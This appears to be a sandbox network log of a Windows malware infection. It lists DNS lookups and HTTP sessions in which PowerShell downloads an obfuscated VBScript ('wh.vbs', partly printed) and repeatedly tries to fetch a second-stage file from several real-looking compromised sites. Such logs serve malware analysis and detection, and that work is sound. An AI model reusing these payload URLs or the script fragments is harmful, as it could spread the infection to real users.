                                                                    Dec 5, 2024 10:39:56.886574030 CET44349952148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:58.474280119 CET44349952148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:58.475692034 CET49952443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:58.475706100 CET44349952148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:59.019412994 CET44349952148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:59.019582987 CET44349952148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:59.019638062 CET49952443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:59.019970894 CET49952443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:03.128804922 CET49965443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:40:03.128835917 CET44349965184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:40:03.129026890 CET49965443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:40:03.129213095 CET49965443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:40:03.129226923 CET44349965184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:40:04.389259100 CET44349965184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:40:04.390386105 CET49965443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:40:04.390403032 CET44349965184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:40:04.848563910 CET44349965184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:40:04.848618984 CET44349965184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:40:04.848709106 CET49965443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:40:04.849155903 CET49965443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:40:08.869862080 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:08.869904041 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:08.869965076 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:08.870234013 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:08.870244980 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.269802094 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.270817995 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:10.270831108 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.816262007 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.816456079 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.816539049 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:10.817239046 CET49981443192.168.2.5148.251.114.233
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 10:38:17.337166071 CET | 192.168.2.5 | 1.1.1.1 | 0xf7cf | Standard query (0) | www.fornid.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:21.138468981 CET | 192.168.2.5 | 1.1.1.1 | 0x6bd4 | Standard query (0) | www.pineappletech.ae | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:22.147492886 CET | 192.168.2.5 | 1.1.1.1 | 0x6bd4 | Standard query (0) | www.pineappletech.ae | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:26.676711082 CET | 192.168.2.5 | 1.1.1.1 | 0x2d3c | Standard query (0) | www.erp-royal-crown.info | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:27.678716898 CET | 192.168.2.5 | 1.1.1.1 | 0x2d3c | Standard query (0) | www.erp-royal-crown.info | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:39.964658022 CET | 192.168.2.5 | 1.1.1.1 | 0x44dd | Standard query (0) | www.almrwad.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 10:38:17.852596045 CET | 1.1.1.1 | 192.168.2.5 | 0xf7cf | No error (0) | www.fornid.com | fornid.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:38:17.852596045 CET | 1.1.1.1 | 192.168.2.5 | 0xf7cf | No error (0) | fornid.com | | 93.95.216.175 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:22.161328077 CET | 1.1.1.1 | 192.168.2.5 | 0x6bd4 | No error (0) | www.pineappletech.ae | | 91.193.42.13 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:22.285103083 CET | 1.1.1.1 | 192.168.2.5 | 0x6bd4 | No error (0) | www.pineappletech.ae | | 91.193.42.13 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:27.711107969 CET | 1.1.1.1 | 192.168.2.5 | 0x2d3c | No error (0) | www.erp-royal-crown.info | erp-royal-crown.info | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:38:27.711107969 CET | 1.1.1.1 | 192.168.2.5 | 0x2d3c | No error (0) | erp-royal-crown.info | | 148.251.114.233 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:27.815964937 CET | 1.1.1.1 | 192.168.2.5 | 0x2d3c | No error (0) | www.erp-royal-crown.info | erp-royal-crown.info | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:38:27.815964937 CET | 1.1.1.1 | 192.168.2.5 | 0x2d3c | No error (0) | erp-royal-crown.info | | 148.251.114.233 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:38:40.719299078 CET | 1.1.1.1 | 192.168.2.5 | 0x44dd | No error (0) | www.almrwad.com | almrwad.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:38:40.719299078 CET | 1.1.1.1 | 192.168.2.5 | 0x44dd | No error (0) | almrwad.com | | 184.171.244.231 | A (IP address) | IN (0x0001) | false
                                                                    • www.fornid.com
                                                                    • www.pineappletech.ae
                                                                    • www.erp-royal-crown.info
                                                                    • www.almrwad.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 93.95.216.175 | 443 | 7164 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:38:19 UTC | 116 | OUT | GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
Host: www.fornid.com
Connection: Keep-Alive
2024-12-05 09:38:20 UTC | 555 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:38:19 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyiskbISKkTmQkL1lNdBd32jy%2F4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZBMCBalW%2FAKWOU2%2FeAFzTBk%3D000075; expires=Wed, 25-Dec-2024 09:38:19 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponly
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
                                                                    Data Ascii: m/252-pompe-per-trattori" title="Pompe per trattori">Pompe per trattori</a></li><li class=""><a href="https://www.fornid.com/253-pompe-per-fognatura" title="Pompe per fognatura">Pompe per fognatura</a><ul class="tm_subUL"><li class=""><a href="https://www
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 22 3e 43 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 35 2d 6d 6f 74 6f 70 6f 6d 70 65 2d 69 72 72 6f 72 61 74 72 69 63 69 22 20 74 69 74 6c 65 3d 22 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 22 3e 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                    Data Ascii: arrelli per irrorazione con motopompe">Carrelli per irrorazione con motopompe</a></li><li class=""><a href="https://www.fornid.com/225-motopompe-irroratrici" title="Motopompe irroratrici">Motopompe irroratrici</a></li></ul></li><li class=""><a href="https
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 3c 64 69 76 3e 0a 0a 09 09 09 09 09 09 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 64 61 72 6b 22 3e 54 6f 74 61 6c 65 3c 2f 73 74 72 6f 6e 67 3e 0a 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 70 72 6f 64 75 63 74 5f 70 72 69 63 65 22 3e 3c 2f 73 70 61 6e 3e 0a 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 63 61 72 74 20 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 6d 64 2d 36 22 3e 0a 0a 09 09 09 09 3c 70 3e 0a 0a 09 09 09 09 09 3c 21 2d 2d 20 50 6c 75 72 61 6c 20 43 61 73 65 20 5b 62 6f 74 68 20 63 61 73 65 73 20 61 72 65 20 6e
                                                                    Data Ascii: </div><div><strong class="dark">Totale</strong><span id="layer_cart_product_price"></span></div></div></div><div class="layer_cart_cart col-xs-12 col-md-6"><p>... Plural Case [both cases are n
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 73 70 61 6c 6c 65 74 2d 65 6c 65 74 74 72 6f 6e 69 63 69 2d 6c 69 66 74 65 72 2d 62 79 2d 70 72 61 6d 61 63 22 20 74 69 74 6c 65 3d 22 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 22 3e 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 33 39 2d 64 69 73 74 72 69 62 75 7a 69 6f 6e 65 2d 67 72 61 73 73 6f 2d 6d 65 63 6c 75 62 65 22 20 74 69 74 6c 65 3d 22 44 49 53 54 52 49 42 55 5a 49 4f 4e 45 20 47 52 41 53 53 4f 20
                                                                    Data Ascii: spallet-elettronici-lifter-by-pramac" title="Transpallet elettronici LIFTER BY PRAMAC">Transpallet elettronici LIFTER BY PRAMAC</a></li></ul></li><li class=""><a href="https://www.fornid.com/339-distribuzione-grasso-meclube" title="DISTRIBUZIONE GRASSO
                                                                    2024-12-05 09:38:20 UTC416INData Raw: 46 46 50 31 20 2d 20 46 46 50 32 20 2d 20 46 46 50 33 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 39 30 2d 6d 61 73 63 68 65 72 65 2d 70 65 72 2d 73 61 6c 64 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 22 3e 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 31 34 2d 73 63 61 72 70 65 2d 61 6e 74 69 6e 66 6f 72 74 75 6e 69 73 74 69 63 68 65 2d 65 2d 73 74 69 76 61 6c 65 2d 64 61 2d 6c 61 76 6f 72 6f
                                                                    Data Ascii: FFP1 - FFP2 - FFP3</a></li><li class=""><a href="https://www.fornid.com/90-maschere-per-saldatura" title="Maschere per saldatura">Maschere per saldatura</a></li><li class=""><a href="https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49711 | 91.193.42.13 | 443 | 7164 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:38:23 UTC | 79 | OUT | GET /ov/wh.vbs HTTP/1.1
    Host: www.pineappletech.ae
    Connection: Keep-Alive
2024-12-05 09:38:24 UTC | 232 | IN | HTTP/1.1 200 OK
    Connection: close
    content-type: text/vbscript
    last-modified: Wed, 26 Jun 2024 05:34:18 GMT
    accept-ranges: bytes
    content-length: 29620
    date: Thu, 05 Dec 2024 09:38:23 GMT
    server: LiteSpeed
    vary: User-Agent
2024-12-05 09:38:24 UTC | 1136 | IN | Data Ascii: Function Maculose242(Rektorat)Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)Maculose242 = ChrW(Rektorat)Opskreknivsplid = Command End Function elektroingenirerne = LenB("Sardinieren") elektroingenirerne = elektroing
2024-12-05 09:38:24 UTC | 14994 | IN | Data Ascii: rivate Const Tapeti = "Deniable datastyr uncelibate"Private Const Noaordets = -4508Private Const Ostemad = &H7502Private Const Botryomyces141 = &HFFFFE888Private Const Ufordrageligste = &H5A65Private Const Reverso = &HE948Private Const Saats =
2024-12-05 09:38:24 UTC | 13490 | IN | Data Ascii: persuadedness"Private Const Skakspillerens = 17488Private Const Glinsende = -42454Private Const Evasiveness = &H48CEPrivate Const Leptorrhinism155 = -18918Private Const Programkomplekset = "Congresses molimen ngsteligeres"Private Const Cigarka


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49733 | 148.251.114.233 | 443 | 2956 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:38:29 UTC | 184 | OUT | GET /wh/Sarothrum.jpb HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:38:29 UTC | 416 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:38:29 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-12-05 09:38:29 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:38:29 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49745 | 148.251.114.233 | 443 | 2956 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:38:35 UTC | 66 | OUT | GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.erp-royal-crown.info
2024-12-05 09:38:35 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:38:35 GMT
    server: LiteSpeed
2024-12-05 09:38:35 UTC | 1130 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:38:35 UTC | 121 | IN | Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49765 | 184.171.244.231 | 443 | 2956 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:38:41 UTC | 81 | OUT | GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:38:42 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:38:42 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:38:42 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49777 | 148.251.114.233 | 443 | 2956 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:38:47 UTC | 90 | OUT | GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:38:48 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:38:48 GMT
    server: LiteSpeed
2024-12-05 09:38:48 UTC | 1130 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:38:48 UTC | 121 | IN | Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49793 | 184.171.244.231 | 443 | 2956 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:38:53 UTC | 81 | OUT | GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:38:54 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:38:54 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:38:54 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49808 | 148.251.114.233 | 443 | 2956 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:38:59 UTC | 90 | OUT | GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:00 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:38:59 GMT
    server: LiteSpeed
2024-12-05 09:39:00 UTC | 1130 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:00 UTC | 121 | IN | Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 8    Source IP: 192.168.2.5    Source Port: 49820    Destination IP: 184.171.244.231    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:05 UTC | 81 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:39:05 UTC | 164 | IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:05 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:05 UTC | 315 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


Session ID: 9    Source IP: 192.168.2.5    Source Port: 49837    Destination IP: 148.251.114.233    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:11 UTC | 90 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:11 UTC | 238 | IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:11 GMT
    server: LiteSpeed
2024-12-05 09:39:11 UTC | 1130 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:11 UTC | 121 | IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii:  Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 10    Source IP: 192.168.2.5    Source Port: 49853    Destination IP: 184.171.244.231    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:17 UTC | 81 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:39:17 UTC | 164 | IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:17 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:17 UTC | 315 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


Session ID: 11    Source IP: 192.168.2.5    Source Port: 49864    Destination IP: 148.251.114.233    Destination Port: 443    PID: 2956    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:23 UTC | 90 | OUT
    GET /wh/Sarothrum.jpb HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:23 UTC | 238 | IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:23 GMT
    server: LiteSpeed
2024-12-05 09:39:23 UTC | 1130 | IN
